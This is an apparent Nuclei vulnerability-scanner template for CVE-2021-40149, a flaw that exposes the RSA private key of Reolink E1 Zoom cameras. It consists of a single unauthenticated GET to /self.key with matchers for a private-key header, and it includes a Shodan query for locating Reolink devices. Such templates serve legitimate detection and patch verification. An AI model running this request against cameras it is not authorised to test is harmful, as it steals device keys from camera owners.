55 lines
1.8 KiB
YAML
55 lines
1.8 KiB
YAML
id: CVE-2021-40149
|
|
|
|
info:
|
|
name: Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure
|
|
author: For3stCo1d
|
|
severity: medium
|
|
description: |
|
|
Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability.
|
|
remediation: |
|
|
Upgrade the Reolink E1 Zoom Camera to a version higher than 3.0.0.716 to mitigate the vulnerability.
|
|
reference:
|
|
- https://dl.packetstormsecurity.net/2206-exploits/reolinke1key-disclose.txt
|
|
- https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40149.txt
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40149
|
|
- http://packetstormsecurity.com/files/167407/Reolink-E1-Zoom-Camera-3.0.0.716-Private-Key-Disclosure.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 5.9
|
|
cve-id: CVE-2021-40149
|
|
cwe-id: CWE-552
|
|
epss-score: 0.00689
|
|
epss-percentile: 0.77833
|
|
cpe: cpe:2.3:o:reolink:e1_zoom_firmware:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: reolink
|
|
product: e1_zoom_firmware
|
|
shodan-query: http.title:"Reolink"
|
|
tags: exposure,unauth,packetstorm,cve,cve2021,reolink,camera,iot
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/self.key"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- '(?m)^-----BEGIN PRIVATE KEY-----'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/json"
|
|
- "application/html"
|
|
condition: and
|
|
negative: true
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100ab5b5786416a31d649807ea75a00721a609b25d839bee3be450e087a7e8627b3022100bfafeb0372957dddb2e22adb40687da3e9aeb0a9f3ab2384690e333ecdab145b:922c64590222798bb761d5b6d8e72950 |